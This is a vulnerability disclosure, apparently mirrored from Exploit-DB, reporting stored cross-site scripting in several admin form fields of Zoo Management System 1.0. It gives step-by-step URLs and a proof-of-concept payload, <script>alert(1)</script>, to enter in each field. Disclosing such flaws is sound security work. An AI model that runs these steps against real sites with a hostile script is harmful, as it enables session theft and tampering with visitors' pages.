Zoo Management System 1.0 – ‘Multiple’ Persistent Cross-Site-Scripting (XSS)

• Exploit Database
• 16 阅读

• 作者： Subhadip Nag
  日期： 2021-07-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50117/

• # Exploit Title: Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS)
  # Date: 08/07/2021
  # Exploit Author: Subhadip Nag
  # Vendor Homepage: https://phpgurukul.com/
  # Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/
  # Version: 1.0
  # Tested on: Server: XAMPP
  
  # Description #
  
  Zoo Management System 1.0 is vulnerable to 'Multiple' stored cross site scripting because of insufficient user supplied data.
  
  # Proof of Concept (PoC) : Exploit #
  
  1) Goto: http://localhost/ZMSP/zms/admin/index.phpandLogin(given User & password)
  2) Goto: http://localhost/ZMSP/zms/admin/add-animals.php
  3) Fill out Animal name, Breed and Description with given payload: <script>alert(1)</script>
  4) Goto: http://localhost/ZMSP/zms/admin/manage-animals.php
  5) Stored XSS payload is fired
  
  6) Goto: http://localhost/ZMSP/zms/admin/manage-ticket.php
  7) Edit any Action field with the following payload: <script>alert(1)</script> and Update
  8) Go back and again click 'Manage Type Ticket'
  9) Stored XSS payload is fired
  
  10) Goto: http://localhost/ZMSP/zms/admin/aboutus.php 
  11) In the Page 'Title' & 'Description',Enter the Payload: <script>alert(1)</script> and Click Update
  
  12) Goto: http://localhost/ZMSP/zms/admin/contactus.php
  13) Put the Same Payload in the Page 'Title' & 'Description' and Click Update 
  14) Logout and click 'Back Home'
  15) Our XSS payload successful
  
  
  # Image PoC : Reference Image #
  
  1) https://ibb.co/g4hFQDV
  2) https://ibb.co/frbpf9c
  3) https://ibb.co/NtKrc9C
  4) https://ibb.co/cFGWhCz
  4) https://ibb.co/CMXmN4f
  5) https://ibb.co/C0dV0PC
  6) https://ibb.co/4ZW8tb3
  7) https://ibb.co/3zgFq9b
  8) https://ibb.co/wS8wXj8